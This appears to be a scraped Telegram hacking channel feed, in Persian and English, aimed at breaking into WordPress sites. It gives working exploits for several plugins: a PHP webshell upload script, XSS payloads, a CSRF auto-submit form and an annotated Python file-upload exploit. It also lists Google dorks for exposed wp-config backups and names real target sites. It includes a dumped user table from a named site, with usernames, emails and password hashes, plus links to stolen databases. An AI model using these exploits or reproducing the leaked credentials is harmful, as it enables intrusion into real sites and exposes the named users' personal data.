0Day.Today | Learn Exploit | Zero World | Dark web |
19.1K subscribers
1.23K photos
125 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
http://nirvanasurfyoga.com/wp-login.php


username = nirva0
😂
pass = ro ham khodetoon crack konid
~~~~~~~~~~~~~~~~~~~~~
@LearnExploit
#Target #Wp #Wordpress
ابزار #V3n0M
اسکنر قدرتمند V3n0M
===============================
امکانات 👇
1- اسکن باگ های XSS,RCE,LFI،SQL I
2- لیست های بسیار بزرگ دورک
3- پیدا کردن صفحه ادمین
4- اسکن ftp برای نفوذ
5-حملات برت فورس
=======================
https://github.com/v3n0m-Scanner/V3n0M-Scanner
~~~~~~~~~~~~~~~~~~~~~
@LearnExploit
#Target #Wp #Wordpress
اموزش نوشتن #کرکر وردپرس
#WP #Cracker by #Evil_Boy
@LearnExploit
0Day.Today (Tele)
#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------

#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"

#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"

#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here

$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.

#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php

========================
#GOODNIGHT
#X0P4SH4

T.me/LearnExploit
0Day.Today
👍1
0Day.Today | Learn Exploit | Zero World | Dark web |
POC اسیب پذیریه XSS در پلاگین (All In One Favicon ) : #XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon 0Day.Today Boy's @LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
1
#DoRk - #Wp_Config (.bak = backup file ) #file
——
> Dork :
inurl:wp-config.bak
——
> POC :
دوستان با این دورک میتونید به فایل backup وردپرس بعضی سایت ها دسترسی داشته باشید.
نحوه ی استفاده :
به دو دیتابیس توجه کنید :
define('DB_USER', '##');
define('DB_PASSWORD', '##');
——
> Like :
http://www.malwarehelp.org/blog/wp-config.bak
================
Our Is Here ( 0Day.Today Boy's :) )
@ L E A R N E X P L O I T - T.me/LearnExploit
#Table ( #WP_USERS )
TARGET : http://www.tecpar.br
~~~~~~~~~~~~~~~~~~~~~
Table :: wp_users ::

INSERT INTO wp_users VALUES (1, 'redsuns', '$P$B5gzRPWnESH0U27g0dx2aqir9y1Hme1', 'redsuns', 'contato@redsuns.com.br', '', '2014-06-09 20:02:50', '', 0, 'redsuns') ;
INSERT INTO wp_users VALUES (2, 'valteny', '$P$BFxx.haMMjfsMXzPepsnrRJNSnmNC70', 'valteny', 'valteny@gmail.com', '', '2014-08-13 18:10:45', '', 0, 'valteny') ;
INSERT INTO wp_users VALUES (3, 'admin', '$P$BC0Vcu19HXeXaoTVwY9NfZbo7YwEWk/', 'admin', '', '', '2014-11-18 17:49:38', '', 0, 'admin') ;
INSERT INTO wp_users VALUES (4, 'eduardo', '$P$BJcdTwweAUbkp01Rgxp1mTWr.Qa.bn1', 'eduardo', '', '', '2014-11-18 17:49:38', '', 0, 'eduardo') ;
INSERT INTO wp_users VALUES (5, 'akloster', '$P$BnsdAolKCuWQpIiMQubH8FBWuhnqss0', 'akloster', '', '', '2014-11-18 17:49:38', '', 0, 'akloster') ;
INSERT INTO wp_users VALUES (6, 'anderson', '$P$BmCs/9/PP1g1ROREeyaTrQSjqxQg9z1', 'anderson', '', '', '2014-11-18 17:49:38', '', 0, 'anderson') ;
INSERT INTO wp_users VALUES (7, 'felipedp', '$P$Btq7wytzkMqc8FtBZxvIns.YZ90wJF1', 'felipedp', '', '', '2014-11-18 17:49:38', '', 0, 'felipedp') ;
INSERT INTO wp_users VALUES (8, 'sayron', '$P$B7SqhCedBYK6vIuozsw/PkoBRvy9Zx0', 'sayron', 'ssouza@tecpar.br', '', '2014-11-18 17:49:38', '', 0, 'sayron') ;
INSERT INTO wp_users VALUES (9, 'joceli', '$P$BSDjYRoVYvrVc8JhIh0wjTcqWYySL6.', 'joceli', '', '', '2014-11-18 17:49:38', '', 0, 'joceli') ;
INSERT INTO wp_users VALUES (10, 'vjsantos', '$P$BcTq5lNJxVVNCXhG/UL.aLacibtZo8.', 'vjsantos', '', '', '2014-11-18 17:49:38', '', 0, 'vjsantos') ;
INSERT INTO wp_users VALUES (11, 'lidiarom', '$P$B2RwmcxxVynttd6kWo.j0TSR55PSVH0', 'lidiarom', '', '', '2014-11-18 17:49:38', '', 0, 'lidiarom') ;
INSERT INTO wp_users VALUES (12, 'Simone', '$P$BCpC.MQuKlCT.Z.BD34q/uEWVMZ1AP.', 'simone', '', '', '2014-11-18 17:49:38', '', 0, 'Simone') ;
INSERT INTO wp_users VALUES (13, 'rosi', '$P$BDBvlJd.vYH0Ty/FJ1AvGbkrXSrD0J.', 'rosi', '', '', '2014-11-18 17:49:38', '', 0, 'rosi') ;
INSERT INTO wp_users VALUES (14, 'magnani', '$P$BaUc454/TNcQYLqTLSYpj92KsZ3quK0', 'magnani', '', '', '2014-11-18 17:49:38', '', 0, 'magnani') ;
INSERT INTO wp_users VALUES (15, 'euzilene', '$P$Bxy/ALTHpZCJ8Tw6.V/KyVm7P2o/i./', 'euzilene', '', '', '2014-11-18 17:49:38', '', 0, 'euzilene') ;
INSERT INTO wp_users VALUES (16, 'silvane', '$P$B.v3pkDM6L3sL.mT6Rmdj64Q3QHKbY0', 'silvane', '', '', '2014-11-18 17:49:38', '', 0, 'silvane') ;
INSERT INTO wp_users VALUES (17, 'jdonanski', '$P$BM538R7Ji0UWXH/uwvXOXTS6J2D4a3/', 'jdonanski', '', '', '2014-11-18 17:49:38', '', 0, 'jdonanski') ;
INSERT INTO wp_users VALUES (18, 'dpontes', '$P$Bt8xboLPfOmyJlQdHVBnxyajCGK..P/', 'dpontes', '', '', '2014-11-18 17:49:38', '', 0, 'dpontes') ;
INSERT INTO wp_users VALUES (19, 'rico', '$P$BnjBqbFjQNjatAxAmRS1SdwQbOg67x0', 'rico', '', '', '2014-11-18 17:49:38', '', 0, 'rico') ;
INSERT INTO wp_users VALUES (20, 'joaops', '$P$BzqZb556wPsQhzcTBQOCeitW5l4kNx/', 'joaops', '', '', '2014-11-18 17:49:38', '', 0, 'joaops') ;
INSERT INTO wp_users VALUES (21, 'julianed', '$P$BMCplNCWk0JJPDcGvq76we8bQozVgX.', 'julianed', '', '', '2014-11-18 17:49:38', '', 0, 'julianed') ;
INSERT INTO wp_users VALUES (22, 'rafaelms', '$P$Blxti6CcAtks1/q7onXTJ.3ZkmyU7P.', 'rafaelms', '', '', '2014-11-18 17:49:38', '', 0, 'rafaelms') ;
INSERT INTO wp_users VALUES (23, 'vcarraro', '$P$BKX5HiC0Pr7RmKXF1s0cPK.3Uh99YT1', 'vcarraro', '', '', '2014-11-18 17:49:38', '', 0, 'vcarraro') ;
INSERT INTO wp_users VALUES (24, 'danielagp', '$P$BtaERjGw1UmkuL1JTCWuKRNlgg3Kr2/', 'danielagp', '', '', '2014-11-18 17:49:39', '', 0, 'danielagp') ;
INSERT INTO wp_users VALUES (25, 'joseph', '$P$BJwZI6Bfumt9SP9BjZuem4xINV5L2W.', 'joseph', '', '', '2014-11-18 17:49:39', '', 0, 'joseph') ;
INSERT INTO wp_users VALUES (26, 'suzanac', '$P$BohN6rm87x8GEFue9M1NL8vdtxaKG2.', 'suzanac', '', '', '2014-11-18 17:49:39', '', 0, 'suzanac') ;

در خط سوم میتونید user & pass ادمین سایت رو مشاهده کنید.
~~~~~~~~~~~~~~~~~~~~~~~~
Hash Type : MD5
~~~~~~~~~~~~~~~~~~~~~~~~
join us : @LearnExploit
#Target #wp #Database
——————————
Target :
https://www.carisma.net/
\-------------\
Database :
yon.ir/SPRfx
\-------------\
file size : 1.6G
——————————-
T.me/LearnExploit
Forwarded from اتچ بات
#Target #wp #Database
——————————
Target :
http://geneseoschools.org/
——————————-
T.me/LearnExploit
〽️ #Upload - #Shell - (#WP_v_5_0_3) #WordPress v 5.0.3 - #Part_1

🔱 موضوع : اموزش اپلود شل روی وردپرس ورژن 5.0.3
🔱 قسمت : 1
🔱 صدا : دارد بدون نویز
🔱 کیفیت : 720
🔱 حجم : 17m
⚠️ اختصاصی از گروه اموزش LearnExploit
⁉️ دانلود در پست بعدی...

✴️ T.me/LearnExploit
☣️ IR0Day.Today Boy's
〽️ #Upload - #Shell - (#WP_v_5_0_3) #WordPress v 5.0.3 - #Part_1

🔱 موضوع : اموزش اپلود شل روی وردپرس ورژن 5.0.3
🔱 قسمت : 1
🔱 صدا : دارد بدون نویز
🔱 کیفیت : 720
🔱 حجم : 17m
⚠️ اختصاصی از گروه اموزش LearnExploit

✴️ T.me/LearnExploit
☣️ IR0Day.Today Boy's
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
----
@LearnExploit
#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.

#‌Description :
این افزونه به شما این اجازه رو میده که فایل هایی با فرمت مختلف روی سایت وردپرسی خودتان اپلود کنید.

⚫️امکانات ویژه افزونه WP Add Mime Types:
🔴رابط کاربری بسیار آسان
🔴قابلیت افزودن فرمت‌های مختلف
🔴دارای تقریباً ۹۰ نوع فرمت مختلف
🔴قابلیت تعریف فرمت‌های دیگر
🔴به‌روزرسانی‌های مرتب
و...

#Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”

#Exploit :
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>

@LearnExploit 🤟🏻
#WP #vulnerabilities #Vuln #File_Upload #Wordpress

آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4

جهت مشاهده ی دمو بزنید.

دورک و تحلیل اسکریپت تو پست بعدی


IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress

آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.


#Google~Dork:
inurl: /wp-content/plugins/smart-product-review/


#Download~Script:
Download

خب بریم ببینیم این اسکریپت چطوری کار میکنه :

خب داره اینجا لایبرری ها رو‌اضافه میکنه

import os.path
from os import path
import json
import requests
import time
import sys



نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")

def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")



خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text

if ("No script kiddies please!!" in raw):
return False;
else:
return True;


انجام امورات مهم :) اینجا صورت گرفته :
def main():

banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho


base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )

بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';


uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check

بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)

if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)




اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )

files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}


print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )

تو خط بالایی داره دیتا هارو میفرسته



بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه

file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)

main();

خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو


IR0Day.Today Boy's
@LearnExploit
@TechArmy
👍2